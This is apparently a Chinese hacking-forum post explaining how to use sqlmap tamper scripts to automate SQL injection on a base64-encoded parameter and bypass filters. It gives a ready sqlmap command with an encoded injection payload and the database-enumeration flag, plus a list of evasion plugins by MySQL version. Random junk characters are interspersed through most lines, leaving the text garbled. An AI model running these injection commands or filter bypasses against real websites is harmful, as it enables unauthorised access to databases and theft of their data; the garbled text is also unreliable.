WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?) e) T. ?2 a4 }
$ e! I3 V5 |! ksqlmap的tamper里有个base64encode.py
# ?# _ G! S! p, v# w6 }1 c
. L: t/ x) o. B" }. y0 W1 [使用如下" b- g( U; ~7 E# q% v7 s F" ^
7 c+ I; n8 J' Q$ f
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
0 {5 t! [" ?. Q/ q/ o
6 H& P7 S" o) }& f7 ?2 a& o; s
' h# k+ V6 Z3 U) J0 c7 z$ D( Fsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”' O$ Q! }$ m( W1 T# s& O
8 W% j) z1 \) W/ C5 ^! a1 L/ m
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
; H& W8 O6 s6 ^! {9 \
( ]: D; G" B' E0 G: o8 u7 Q' O0 dspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
' E' h' K( C2 N7 k" ^2 p0 N ?space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入9 s! j# w7 P( g% N0 ?) l! D
首先确定目标数据库版本,然后选择相应的脚本。
8 [/ O, z9 l$ R6 d$ L/ f- s-v 3 --batch --tamper "space2hash.py"
! d0 |$ K. k1 V- E6 q1 h- J+ N: X7 u8 Z* s4 R) u
还有其他一些插件:5 _7 f4 O4 n# N9 x
encodes编码 ——charencode.py4 t0 d/ A6 u0 Y% A' K* J s
base64编码 —— base64encode.py
3 A0 G1 o e& u+ S0 z替换空格和关键字 —— halfversionedmorekeywords.py
, ?3 }( I2 k8 C | ) R) ?4 ^7 K* b" _9 r
* W; ~, I3 M: Z1 F. ?; P' t9 x/ K
5 Q* X$ e% g6 N
4 j2 Y8 M" h" t3 L4 K |